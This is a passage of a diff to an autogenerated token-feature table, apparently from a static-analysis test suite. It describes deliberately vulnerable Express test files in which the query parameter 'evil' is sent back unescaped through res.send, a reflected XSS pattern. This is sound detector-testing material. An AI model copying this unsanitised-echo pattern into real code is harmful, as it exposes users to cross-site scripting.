autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:5 | res | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:10 | res.send | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:10 | res.send | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | exceptional return of res.send(response) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | exceptional return of res.send(response) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | exceptional return of res.send(response) | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | exceptional return of res.send(response) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | exceptional return of res.send(response) | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | res.send(response) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | res.send(response) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | res.send(response) | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | res.send(response) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:3:11:20 | res.send(response) | fileImports | express is-var-name | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:7:11:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:7:11:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:7:11:10 | send | enclosingFunctionBody | req res response Hello, world! req query jsonp isVarName req query jsonp response req query jsonp ( response ) res send response | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:7:11:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/etherpad.js:11:7:11:10 | send | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:11:12:11:19 | response | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/etherpad.js:11:12:11:19 | response | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/etherpad.js:11:12:11:19 | response | contextFunctionInterfaces | | @@ -21365,24 +142659,190 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/etherpad.js:11:12:11:19 | response | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/etherpad.js:11:12:11:19 | response | fileImports | express is-var-name | | autogenerated/Xss/ReflectedXss/etherpad.js:11:12:11:19 | response | receiverName | res | +| autogenerated/Xss/ReflectedXss/formatting.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:1:1:0 | this | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:1:1:1 | require | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:11 | express | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:32 | express | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:5:1:32 | express ... press') | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:21 | require | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:32 | exceptional return of require('express') | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:1:15:1:32 | require('express') | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/formatting.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/formatting.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/formatting.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/formatting.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/formatting.js:1:23:1:31 | 'express' | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:7 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:7 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:7 | express | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:9 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:9 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:9 | exceptional return of express() | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:9 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:9 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:9 | express() | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:13 | express().get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:13 | express().get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:3:13 | express().get | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:8:2 | exceptional return of express ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:8:2 | exceptional return of express ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:8:2 | exceptional return of express ... T OK\\n}) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:8:2 | express ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:8:2 | express ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:1:8:2 | express ... T OK\\n}) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:11:3:13 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:11:3:13 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:11:3:13 | get | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:3:15:3:22 | '/user/' | CalleeFlexibleAccessPath | express().get | | autogenerated/Xss/ReflectedXss/formatting.js:3:15:3:22 | '/user/' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/formatting.js:3:15:3:22 | '/user/' | calleeImports | express | | autogenerated/Xss/ReflectedXss/formatting.js:3:15:3:22 | '/user/' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/formatting.js:3:15:3:22 | '/user/' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/formatting.js:3:15:3:22 | '/user/' | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | require | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | require | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | require | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | this | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | this | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:3:24 | this | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | 'arguments' object of anonymous function | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | exceptional return of anonymous function | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | exceptional return of anonymous function | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | express().get | | autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | functio ... OT OK\\n} | calleeImports | express | | autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | functio ... OT OK\\n} | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | return of anonymous function | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:25:8:1 | return of anonymous function | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:34:3:36 | req | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:3:39:3:41 | res | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:12 | evil | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:12 | evil | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:12 | evil | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:12 | evil | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:12 | evil | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil = ... ry.evil | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil = ... ry.evil | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil = ... ry.evil | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil = ... ry.evil | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:9:4:29 | evil = ... ry.evil | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:18 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:18 | req | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:18 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:18 | req | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:24 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:24 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:24 | req.query | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:24 | req.query | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:24 | req.query | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:29 | req.query.evil | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:29 | req.query.evil | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:29 | req.query.evil | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:29 | req.query.evil | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:16:4:29 | req.query.evil | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:20:4:24 | query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:20:4:24 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:4:20:4:24 | query | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:20:4:24 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:20:4:24 | query | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:4:26:4:29 | evil | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:4:26:4:29 | evil | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:4:26:4:29 | evil | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:4:26:4:29 | evil | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:4:26:4:29 | evil | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:7 | res | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:7 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:7 | res | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:12 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:12 | res.send | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:12 | res.send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:12 | res.send | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | exceptional return of res.sen ... evil)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | exceptional return of res.sen ... evil)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | exceptional return of res.sen ... evil)) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | exceptional return of res.sen ... evil)) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | exceptional return of res.sen ... evil)) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | res.sen ... evil)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | res.sen ... evil)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | res.sen ... evil)) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | res.sen ... evil)) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:5:5:48 | res.sen ... evil)) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:9:5:12 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:9:5:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:5:9:5:12 | send | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:9:5:12 | send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:9:5:12 | send | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:20 | console | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:20 | console | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:20 | console | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:20 | console | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:20 | console | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:24 | console.log | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:24 | console.log | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:24 | console.log | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:24 | console.log | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:24 | console.log | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | console ... , evil) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | console ... , evil) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | console ... , evil) | contextFunctionInterfaces | | @@ -21391,6 +142851,16 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | console ... , evil) | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | console ... , evil) | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | console ... , evil) | receiverName | res | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | exceptional return of console ... , evil) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | exceptional return of console ... , evil) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | exceptional return of console ... , evil) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | exceptional return of console ... , evil) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:14:5:47 | exceptional return of console ... , evil) | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:5:22:5:24 | log | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:5:22:5:24 | log | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:5:22:5:24 | log | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:5:22:5:24 | log | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:5:22:5:24 | log | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:5:26:5:40 | "
    %s
    " | CalleeFlexibleAccessPath | console.log | | autogenerated/Xss/ReflectedXss/formatting.js:5:26:5:40 | "
    %s
    " | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/formatting.js:5:26:5:40 | "
    %s
    " | contextFunctionInterfaces | | @@ -21407,6 +142877,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/formatting.js:5:43:5:46 | evil | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/ReflectedXss/formatting.js:5:43:5:46 | evil | fileImports | express printf | | autogenerated/Xss/ReflectedXss/formatting.js:5:43:5:46 | evil | receiverName | console | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:7 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:7 | res | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:7 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:7 | res | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:12 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:12 | res.send | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
    evil res send require printf
    %s
    evil | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:12 | res.send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:12 | res.send | fileImports | express printf | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | exceptional return of res.sen ... evil)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | exceptional return of res.sen ... evil)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/formatting.js:6:5:6:48 | exceptional return of res.sen ... evil)) | enclosingFunctionBody | req res evil req query evil res send console log
    %s
    evil res send util format
    %s
